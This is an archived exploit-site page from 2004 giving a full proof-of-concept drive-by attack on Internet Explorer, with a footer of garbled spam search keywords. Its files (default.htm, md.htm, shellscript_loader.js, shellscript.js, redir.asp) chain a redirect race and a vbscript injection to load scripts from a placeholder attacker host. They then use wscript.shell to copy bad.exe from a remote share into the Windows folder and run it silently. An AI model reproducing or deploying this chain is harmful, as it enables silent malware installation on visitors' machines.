about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft Internet Explorer Remote Wscript.Shell Exploit



2004-07-13 Microsoft Internet Explorer Remote Wscript.Shell Exploit
Proof of Concept Exploit by Ferruh Mavituna
Solution : The IEFix.reg registry file will protect you from this new
variant/exploit

----------------------------------------------------- default.htm
--------------------------------------------
<html>
<body>
<img src="cc.exe" width=0 height=0 style=display:none>

<script language="Javascript">

function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-1000\;dialogLeft:-1000\;dialogHeight:1\;
dialogWidth:1\;").
location="vbscript:\"<SCRIPT
SRC='http://IPADDRESS/shellscript_loader.js'><\/script>\"";
}

</script>

<script language="javascript">

setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()')
",101);
document.write('<IFRAME ID=myiframe NAME=myiframe
SRC="redir.asp" style=display:none;>
</IFRAME>');

</script>

</body>
</html>

--------------------------------------------------------- md.htm
---------------------------------------------
<SCRIPT language="javascript">

window.returnValue = window.dialogArguments;

function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}

CheckStatus();

</SCRIPT>

--------------------------------------------------- shellscript_loader.js
-------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT
SRC='http://IPADDRESS/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200
HEIGHT=200>
</IFRAME>");
setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js
------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script
language=
"JScript" DEFER>var
rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe";var
wF="%windir%
\\\\_tmp.exe";var o=new ActiveXObject("wscript.shell");var
e="%comspec% /c copy "+rF+" "+wF;
var err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
}
document.write('<iframe
src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
--------------------------------------------------------- redir.asp
--------------------------------------------
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next

Response.Status = "302 Found" 
Response.AddHeader "Content-Length", "4"
Response.AddHeader
"Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>
securitydot.net - 2004-07-13

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 09:38:57 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.sex.fi www.xnxx.c WWW.Vid Www girl x Banglorese rnovies Hac free bangl www.cartoo php-nuke 2 form 200 /compo www.bharat sxywoman njfhm.com www.aoseed www.3plc.c pritty zin SEX.VIDYO PHP/4.4.4- adult only company.ch free seex. Free__ Www Virtual th PHP/4.4.4- localhost Sex777 trisha bat voodo chat tamil act girlandboy all cartoo mengxingsh t344t t397t Videosxxxg www.cshydz (Windows K HAURI Anti haomove.cn saxygirlvi ericsson saxygirlvi mod_cgid C Indiansexp bhanerotic www.ft371. www.lalat. 8.05